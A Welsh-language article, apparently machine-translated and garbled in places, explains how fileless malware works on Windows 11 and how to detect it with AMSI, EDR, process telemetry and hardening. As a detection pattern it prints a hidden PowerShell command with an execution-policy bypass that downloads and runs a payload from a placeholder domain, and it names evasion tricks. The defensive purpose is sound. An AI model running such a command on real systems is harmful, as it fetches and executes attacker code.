Sut i ganfod meddalwedd faleisus di-ffeil peryglus yn Windows 11

¿Sut i ganfod meddalwedd faleisus di-ffeil peryglus? Mae gweithgaredd ymosodiadau di-ffeiliau wedi tyfu'n sylweddol, ac i waethygu pethau, Nid yw Windows 11 yn imiwnMae'r dull hwn yn osgoi'r ddisg ac yn dibynnu ar gof ac offer system cyfreithlon; dyna pam mae rhaglenni gwrthfeirws sy'n seiliedig ar lofnodion yn ei chael hi'n anodd. Os ydych chi'n chwilio am ffordd ddibynadwy o'i ganfod, yr ateb yw cyfuno telemetreg, dadansoddi ymddygiad, a rheolyddion Windows.

Yn yr ecosystem gyfredol, mae ymgyrchoedd sy'n camddefnyddio PowerShell, WMI, neu Mshta yn cydfodoli â thechnegau mwy soffistigedig fel chwistrelliadau cof, dyfalbarhad "heb gyffwrdd" â'r ddisg, a hyd yn oed camdriniaethau cadarnweddY gamp yw deall y map bygythiadau, y cyfnodau ymosod, a pha signalau maen nhw'n eu gadael hyd yn oed pan fydd popeth yn digwydd o fewn RAM.

Beth yw meddalwedd faleisus di-ffeil a pham ei fod yn bryder yn Windows 11?

Pan rydyn ni'n siarad am fygythiadau "di-ffeil", rydyn ni'n cyfeirio at god maleisus sydd Nid oes angen i chi adneuo ffeiliau gweithredadwy newydd yn y system ffeiliau i weithredu. Fel arfer caiff ei chwistrellu i brosesau sy'n rhedeg a'i weithredu yn RAM, gan ddibynnu ar ddehonglwyr a ffeiliau deuaidd wedi'u llofnodi gan Microsoft (e.e., PowerShell, WMI, rundll32, mshtaMae hyn yn lleihau eich ôl troed ac yn caniatáu ichi osgoi peiriannau sydd ond yn chwilio am ffeiliau amheus.

Mae hyd yn oed dogfennau swyddfa neu PDFs sy'n manteisio ar wendidau i lansio gorchmynion yn cael eu hystyried yn rhan o'r ffenomen, oherwydd actifadu gweithrediad yn y cof heb adael ffeiliau deuaidd defnyddiol i'w dadansoddi. Camddefnyddio macros a DDE Yn Office, gan fod y cod yn rhedeg mewn prosesau cyfreithlon fel WinWord.

Mae ymosodwyr yn cyfuno peirianneg gymdeithasol (gwe-rwydo, dolenni sbam) â thrapiau technegol: mae clic y defnyddiwr yn cychwyn cadwyn lle mae sgript yn lawrlwytho ac yn gweithredu'r llwyth tâl terfynol yn y cof, osgoi gadael ôl ar y ddisg. Mae'r amcanion yn amrywio o ladrad data i weithredu ransomware, i symudiad ochrol tawel.

Teipolegau yn ôl ôl troed yn y system: o 'pur' i hybridau

Er mwyn osgoi drysu cysyniadau, mae'n ddefnyddiol gwahanu bygythiadau yn ôl eu graddfa o ryngweithio â'r system ffeiliau. Mae'r categoreiddio hwn yn egluro beth sy'n parhau, ble mae'r cod yn byw, a pha arwyddion mae'n eu gadael?.

Math I: dim gweithgaredd ffeil

Nid yw meddalwedd faleisus gwbl ddi-ffeil yn ysgrifennu dim i'r ddisg. Enghraifft glasurol yw manteisio ar bregusrwydd rhwydwaith (fel y fector EternalBlue yn ôl yn y dydd) i weithredu drws cefn sy'n byw yng nghof y cnewyllyn (achosion fel DoublePulsar). Yma, mae popeth yn digwydd yn yr RAM ac nid oes unrhyw arteffactau yn y system ffeiliau.

Dewis arall yw halogi'r firmware o gydrannau: BIOS/UEFI, addaswyr rhwydwaith, perifferolion USB (technegau tebyg i BadUSB) neu hyd yn oed is-systemau CPU. Maent yn parhau trwy ailgychwyniadau ac ailosodiadau, gyda'r anhawster ychwanegol bod Ychydig o gynhyrchion sy'n archwilio cadarnweddYmosodiadau cymhleth yw'r rhain, yn llai aml, ond yn beryglus oherwydd eu bod yn ddirgel ac yn wydn.

Math II: Gweithgaredd archifo anuniongyrchol

Yma, nid yw'r meddalwedd faleisus yn "gadael" ei weithredadwy ei hun, ond mae'n defnyddio cynwysyddion a reolir gan y system sydd i bob pwrpas yn cael eu storio fel ffeiliau. Er enghraifft, drysau cefn sy'n plannu gorchmynion plisgyn yn ystorfa WMI a sbarduno ei gweithrediad gyda hidlwyr digwyddiadau. Mae'n bosibl ei osod o'r llinell orchymyn heb ollwng ffeiliau deuaidd, ond mae'r ystorfa WMI yn aros ar ddisg fel cronfa ddata gyfreithlon, gan ei gwneud hi'n anodd ei glanhau heb effeithio ar y system.

O safbwynt ymarferol, fe'u hystyrir yn ddi-ffeil, oherwydd bod y cynhwysydd hwnnw (WMI, y Gofrestrfa, ac ati) Nid ffeil weithredadwy ganfyddadwy glasurol mohoni Ac nid yw ei lanhau yn ddibwys. Y canlyniad: dyfalbarhad cudd heb fawr o olion "traddodiadol".

Math III: Angen ffeiliau i weithredu

Mae rhai achosion yn cynnal dyfalbarhad 'di-ffeil' Ar lefel resymegol, mae angen sbardun sy'n seiliedig ar ffeiliau arnyn nhw. Yr enghraifft nodweddiadol yw Kovter: mae'n cofrestru berf gragen ar gyfer estyniad ar hap; pan agorir ffeil gyda'r estyniad hwnnw, lansir sgript fach gan ddefnyddio mshta.exe, sy'n ail-greu'r llinyn maleisus o'r Gofrestrfa.

Y tric yw nad yw'r ffeiliau "abwyd" hyn gydag estyniadau ar hap yn cynnwys llwyth tâl y gellir ei ddadansoddi, ac mae'r rhan fwyaf o'r cod yn gorwedd yn y cofrestru (cynhwysydd arall). Dyna pam eu bod wedi'u categoreiddio fel rhai di-ffeil o ran effaith, er eu bod, yn fanwl gywir, yn dibynnu ar un neu fwy o arteffactau disg fel sbardun.

Fectorau a 'gwesteiwyr' haint: ble mae'n mynd i mewn a ble mae'n cuddio

Er mwyn gwella canfod, mae'n hanfodol mapio'r pwynt mynediad a gwesteiwr yr haint. Mae'r persbectif hwn yn helpu i ddylunio rheolaethau penodol Blaenoriaethwch delemetreg briodol.

campau

• Yn seiliedig ar ffeiliau (Math III): Gall dogfennau, ffeiliau gweithredadwy, ffeiliau Flash/Java etifeddol, neu ffeiliau LNK fanteisio ar y porwr neu'r peiriant sy'n eu prosesu i lwytho cod cregyn i'r cof. Y fector cyntaf yw ffeil, ond mae'r llwyth tâl yn teithio i RAM.
• Seiliedig ar rwydwaith (Math I): Mae pecyn sy'n manteisio ar wendid (e.e., yn SMB) yn cyflawni gweithrediad yn y defnyddiwr neu'r cnewyllyn. Poblogeiddiodd WannaCry y dull hwn. Llwyth cof uniongyrchol heb ffeil newydd.

caledwedd

• dyfeisiau (Math I): Gellir newid cadarnwedd disg neu gerdyn rhwydwaith a chyflwyno cod. Anodd ei archwilio ac mae'n parhau y tu allan i'r system weithredu.
• CPU ac is-systemau rheoli (Math I): Mae technolegau fel ME/AMT Intel wedi dangos llwybrau i Rhwydweithio a gweithredu y tu allan i'r system weithreduMae'n ymosod ar lefel isel iawn, gyda photensial uchel i fod yn llechwraidd.
• USB (Math I): Mae BadUSB yn caniatáu ichi ailraglennu gyriant USB i efelychu bysellfwrdd neu NIC a lansio gorchmynion neu ailgyfeirio traffig.
• BIOS / UEFI (Math I): ailraglennu cadarnwedd maleisus (achosion fel Mebromi) sy'n rhedeg cyn i Windows gychwyn.
• Hypervisor (Math I): Gweithredu mini-hypervisor o dan y system weithredu i guddio ei bresenoldeb. Prin, ond wedi'i weld eisoes ar ffurf rootkits hypervisor.

Gweithredu a chwistrellu

• Yn seiliedig ar ffeiliau (Math III): EXE/DLL/LNK neu dasgau wedi'u hamserlennu sy'n lansio chwistrelliadau i brosesau cyfreithlon.
• Macros (Math III): Gall VBA yn Office ddadgodio a gweithredu llwythi tâl, gan gynnwys ransomware llawn, gyda chydsyniad y defnyddiwr trwy dwyll.
• Sgriptiau (Math II): PowerShell, VBScript neu JScript o ffeil, llinell orchymyn, gwasanaethau, Cofrestru neu WMIGall yr ymosodwr deipio'r sgript mewn sesiwn o bell heb gyffwrdd â'r ddisg.
• Cofnod cychwyn (MBR/Cychwyn) (Math II): Mae teuluoedd fel Petya yn trosysgrifo'r sector cychwyn i gymryd rheolaeth wrth gychwyn. Mae y tu allan i'r system ffeiliau, ond yn hygyrch i'r system weithredu ac atebion modern a all ei adfer.

Sut mae ymosodiadau di-ffeil yn gweithredu: cyfnodau a signalau

Er nad ydyn nhw'n gadael ffeiliau gweithredadwy, mae'r ymgyrchoedd yn dilyn rhesymeg gam wrth gam. Mae eu deall yn caniatáu monitro. digwyddiadau a pherthnasoedd rhwng prosesau sy'n gadael marc.

• Mynediad cychwynnolYmosodiadau gwe-rwydo gan ddefnyddio dolenni neu atodiadau, gwefannau wedi'u peryglu, neu gymwysterau wedi'u dwyn. Mae llawer o gadwyni'n dechrau gyda dogfen Office sy'n sbarduno gorchymyn PowerShell.
• Dyfalbarhad: drysau cefn trwy WMI (hidlwyr a thanysgrifiadau), Allweddi gweithredu'r gofrestrfa neu dasgau wedi'u hamserlennu sy'n ail-lansio sgriptiau heb ffeil faleisus newydd.
• AllhidloUnwaith y bydd y wybodaeth wedi'i chasglu, caiff ei hanfon allan o'r rhwydwaith gan ddefnyddio prosesau dibynadwy (porwyr, PowerShell, bitsadmin) i gymysgu traffig.

Mae'r patrwm hwn yn arbennig o dwyllodrus oherwydd y dangosyddion ymosodiad Maent yn cuddio mewn normalrwydd: dadleuon llinell orchymyn, cadwyno prosesau, cysylltiadau allanol anarferol, neu fynediad at APIs chwistrellu.

Technegau cyffredin: o'r cof i'r recordiad

Mae'r actorion yn dibynnu ar ystod o dulliau sy'n optimeiddio llechwraidd. Mae'n ddefnyddiol gwybod y rhai mwyaf cyffredin i actifadu canfod effeithiol.

• Preswylydd er cof: Llwytho llwythi i ofod proses ddibynadwy sy'n aros i gael ei actifadu. rootkits a bachynnau Yn y cnewyllyn, maen nhw'n codi lefel y cuddio.
• Parhad yn y GofrestrfaCadwch y blobiau wedi'u hamgryptio mewn allweddi a'u hailhydradu o lansiwr cyfreithlon (mshta, rundll32, wscript). Gall y gosodwr dros dro hunanddinistrio i leihau ei ôl troed.
• Gwe-rwydo manylion mewngofnodiGan ddefnyddio enwau defnyddwyr a chyfrineiriau wedi'u dwyn, mae'r ymosodwr yn gweithredu cregyn a phlanhigion o bell mynediad tawel yn y Gofrestrfa neu WMI.
• Ransomware 'Di-ffeil'Mae amgryptio a chyfathrebu C2 yn cael eu trefnu o RAM, gan leihau cyfleoedd i'w canfod nes bod y difrod yn weladwy.
• Pecynnau gweithredu: cadwyni awtomataidd sy'n canfod gwendidau ac yn defnyddio llwythi cof yn unig ar ôl i'r defnyddiwr glicio.
• Dogfennau gyda chod: macros a mecanweithiau fel DDE sy'n sbarduno gorchmynion heb arbed ffeiliau gweithredadwy ar ddisg.

Mae astudiaethau diwydiant eisoes wedi dangos uchafbwyntiau nodedig: mewn un cyfnod yn 2018, a cynnydd o dros 90% mewn ymosodiadau sy'n seiliedig ar sgriptiau a chadwyn PowerShell, arwydd bod y fector yn cael ei ffafrio oherwydd ei effeithiolrwydd.

Yr her i gwmnïau a chyflenwyr: pam nad yw blocio yn ddigon

Byddai'n demtasiwn analluogi PowerShell neu wahardd macros am byth, ond Byddech chi'n torri'r llawdriniaethMae PowerShell yn golofn gweinyddiaeth fodern ac mae Office yn hanfodol mewn busnes; yn aml nid yw blocio'n ddall yn ymarferol.

Ar ben hynny, mae yna ffyrdd o osgoi rheolyddion sylfaenol: rhedeg PowerShell trwy DLLs a rundll32, pecynnu sgriptiau i mewn i EXEs, Dewch â'ch copi eich hun o PowerShell neu hyd yn oed guddio sgriptiau mewn delweddau a'u tynnu i'r cof. Felly, ni all yr amddiffyniad fod yn seiliedig ar wadu bodolaeth offer yn unig.

Camgymeriad cyffredin arall yw dirprwyo'r penderfyniad cyfan i'r cwmwl: os oes rhaid i'r asiant aros am ymateb gan y gweinydd, Rydych chi'n colli atal amser realGellir uwchlwytho data telemetreg i gyfoethogi'r wybodaeth, ond y Rhaid i liniaru ddigwydd wrth y pwynt terfynol.

Sut i ganfod meddalwedd faleisus di-ffeil yn Windows 11: telemetreg ac ymddygiad

Y strategaeth fuddugol yw monitro prosesau a chofNid ffeiliau. Mae ymddygiadau maleisus yn fwy sefydlog na'r ffurfiau y mae ffeil yn eu cymryd, gan eu gwneud yn ddelfrydol ar gyfer peiriannau atal.

• AMSI (Rhyngwyneb Sganio Gwrth-ddrwgwedd)Mae'n rhyng-gipio sgriptiau PowerShell, VBScript, neu JScript hyd yn oed pan fyddant wedi'u hadeiladu'n ddeinamig yn y cof. Ardderchog ar gyfer cipio llinynnau wedi'u drysu cyn eu gweithredu.
• Monitro prosesau: dechrau/gorffen, PID, rhieni a phlant, llwybrau, llinellau gorchymyn a hashes, ynghyd â choed gweithredu i ddeall y stori lawn.
• Dadansoddiad cof: canfod pigiadau, llwythi adlewyrchol neu PE heb gyffwrdd â'r ddisg, ac adolygu rhanbarthau gweithredadwy anarferol.
• Diogelu sector cychwyn: rheoli ac adfer yr MBR/EFI rhag ofn y bydd ymyrraeth.

Yn ecosystem Microsoft, mae Defender for Endpoint yn cyfuno AMSI, monitro ymddygiadDefnyddir sganio cof a dysgu peirianyddol yn y cwmwl i raddio canfodiadau yn erbyn amrywiadau newydd neu rai wedi'u drysu. Mae gwerthwyr eraill yn defnyddio dulliau tebyg gydag injans sy'n byw yn y cnewyllyn.

Enghraifft realistig o gydberthynas: o ddogfen i PowerShell

Dychmygwch gadwyn lle mae Outlook yn lawrlwytho atodiad, mae Word yn agor y ddogfen, mae cynnwys gweithredol yn cael ei alluogi, a PowerShell yn cael ei lansio gyda pharamedrau amheus. Byddai telemetreg briodol yn dangos y Llinell orchymyn (e.e., ExecutionPolicy Bypass, ffenestr gudd), cysylltu â pharth di-ymddiried a chreu proses blentyn sy'n gosod ei hun yn AppData.

Mae asiant â chyd-destun lleol yn gallu stopio a gwrthdroi gweithgaredd maleisus heb ymyrraeth â llaw, yn ogystal â hysbysu'r SIEM neu drwy e-bost/SMS. Mae rhai cynhyrchion yn ychwanegu haen priodoli achos gwraidd (modelau tebyg i StoryLine), sy'n pwyntio nid at y broses weladwy (Outlook/Word), ond at y edau faleisus lawn a'i darddiad i lanhau'r system yn gynhwysfawr.

Gallai patrwm gorchymyn nodweddiadol i gadw llygad amdano edrych fel hyn: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Nid yw rhesymeg yn llinyn union, ond y set o signalau: osgoi polisi, ffenestr gudd, lawrlwytho clir, a gweithredu yn y cof.

AMSI, piblinell a rôl pob actor: o'r pwynt terfynol i'r SOC

Y tu hwnt i gipio sgriptiau, mae pensaernïaeth gadarn yn trefnu camau sy'n hwyluso ymchwiliad ac ymateb. Gorau po fwyaf o dystiolaeth sydd cyn cyflawni'r llwyth., orau.

• Rhyng-gipio sgriptMae AMSI yn cyflwyno'r cynnwys (hyd yn oed os caiff ei gynhyrchu ar unwaith) ar gyfer dadansoddi statig a deinamig mewn piblinell meddalwedd faleisus.
• Digwyddiadau prosesuCesglir PIDs, binaries, hashes, llwybrau, a data arall. dadleuon, gan sefydlu'r coed proses a arweiniodd at y llwyth terfynol.
• Canfod ac adroddMae'r canfyddiadau'n cael eu harddangos ar gonsol y cynnyrch ac yn cael eu hanfon ymlaen i lwyfannau rhwydwaith (NDR) ar gyfer delweddu ymgyrchoedd.
• Gwarantau defnyddwyrHyd yn oed os yw sgript yn cael ei chwistrellu i'r cof, y fframwaith Mae AMSI yn ei ryng-gipio mewn fersiynau cydnaws o Windows.
• Galluoedd gweinyddwr: ffurfweddiad polisi i alluogi archwilio sgriptiau, blocio sy'n seiliedig ar ymddygiad a chreu adroddiadau o'r consol.
• Gwaith SOC: echdynnu arteffactau (UUID VM, fersiwn OS, math o sgript, proses gychwynnol a'i rhiant, hashes a llinellau gorchymyn) i ail-greu'r hanes a rheolau codi dyfodol.

Pan fydd y platfform yn caniatáu allforio'r byffer cof Yn gysylltiedig â'r gweithredu, gall ymchwilwyr gynhyrchu canfyddiadau newydd a chyfoethogi'r amddiffyniad yn erbyn amrywiadau tebyg.

Mesurau ymarferol yn Windows 11: atal a hela

Yn ogystal â chael EDR gydag archwiliad cof ac AMSI, mae Windows 11 yn caniatáu ichi gau mannau ymosod a gwella gwelededd gyda rheolyddion brodorol.

• Cofrestru a chyfyngiadau yn PowerShellYn galluogi Cofnodi Blociau Sgript a Chofnodi Modiwlau, yn defnyddio moddau cyfyngedig lle bo modd, ac yn rheoli'r defnydd o Osgoi/Cudd.
• Rheolau Lleihau Arwyneb Ymosodiad (ASR): yn rhwystro lansio sgriptiau gan brosesau Office a Camddefnyddio WMI/PSExec pan nad oes ei angen.
• Polisïau macro swyddfa: yn analluogi yn ddiofyn, llofnodi macro mewnol a rhestrau ymddiriedaeth llym; yn monitro llifau DDE etifeddol.
• Archwilio a Chofrestrfa WMI: yn monitro tanysgrifiadau digwyddiadau ac allweddi gweithredu awtomatig (Run, RunOnce, Winlogon), yn ogystal â chreu tasgau wedi'i drefnu.
• Amddiffyniad cychwyn: yn actifadu Cychwyn Diogel, yn gwirio cyfanrwydd MBR/EFI ac yn dilysu nad oes unrhyw addasiadau wrth gychwyn.
• Clytio a chaledu: yn cau gwendidau y gellir eu hecsbloetio mewn porwyr, cydrannau Office, a gwasanaethau rhwydwaith.
• ymwybyddiaeth: hyfforddi defnyddwyr a thimau technegol mewn gwe-rwydo a signalau o dienyddiadau cudd.

Ar gyfer hela, canolbwyntiwch ar ymholiadau am: creu prosesau gan Office tuag at PowerShell/MSHTA, dadleuon gyda llwytho i lawr llinyn/llwytho i lawr ffeilSgriptiau gyda drysu clir, chwistrelliadau myfyriol, a rhwydweithiau allanol i TLDs amheus. Croesgyfeiriwch y signalau hyn gydag enw da ac amlder i leihau sŵn.

Beth all pob injan ei ganfod heddiw?

Mae atebion menter Microsoft yn cyfuno AMSI, dadansoddeg ymddygiadol, archwilio cof a diogelwch sector cychwyn, ynghyd â modelau dysgu ar lefel y cwmwl i raddio yn erbyn bygythiadau sy'n dod i'r amlwg. Mae gwerthwyr eraill yn gweithredu monitro lefel y cnewyllyn i wahaniaethu rhwng meddalwedd faleisus a diniwed gyda rholio newidiadau yn ôl yn awtomatig.

Dull sy'n seiliedig ar straeon dienyddio Mae'n caniatáu ichi nodi'r achos gwreiddiol (er enghraifft, atodiad Outlook sy'n sbarduno cadwyn) a lliniaru'r goeden gyfan: sgriptiau, allweddi, tasgau, a ffeiliau deuaidd canolradd, gan osgoi mynd yn sownd ar y symptom gweladwy.

Camgymeriadau cyffredin a sut i'w hosgoi

Nid yn unig y mae rhwystro PowerShell heb gynllun rheoli amgen yn anymarferol, ond mae yna hefyd ffyrdd o'i alw'n anuniongyrcholMae'r un peth yn wir am macros: naill ai rydych chi'n eu rheoli gyda pholisïau a llofnodion, neu bydd y busnes yn dioddef. Mae'n well canolbwyntio ar delemetreg a rheolau ymddygiad.

Camgymeriad cyffredin arall yw credu bod rhoi rhestr wen o gymwysiadau yn datrys popeth: mae technoleg ddi-ffeiliau yn dibynnu'n union ar hyn. apps dibynadwyDylai'r rheolaeth arsylwi ar yr hyn maen nhw'n ei wneud a sut maen nhw'n ymwneud, nid dim ond a ydyn nhw'n cael caniatâd i wneud hynny.

Gyda'r holl bethau uchod, mae meddalwedd faleisus di-ffeiliau yn peidio â bod yn "ysbryd" pan fyddwch chi'n monitro'r hyn sy'n wirioneddol bwysig: ymddygiad, cof a tharddiad o bob gweithrediad. Mae cyfuno AMSI, telemetreg proses gyfoethog, rheolyddion Windows 11 brodorol, a haen EDR gyda dadansoddiad ymddygiadol yn rhoi'r fantais i chi. Ychwanegwch at yr hafaliad bolisïau realistig ar gyfer macros a PowerShell, archwilio WMI/Cofrestrfa, a hela sy'n blaenoriaethu llinellau gorchymyn a choed prosesau, ac mae gennych amddiffyniad sy'n torri'r cadwyni hyn cyn iddynt wneud sŵn.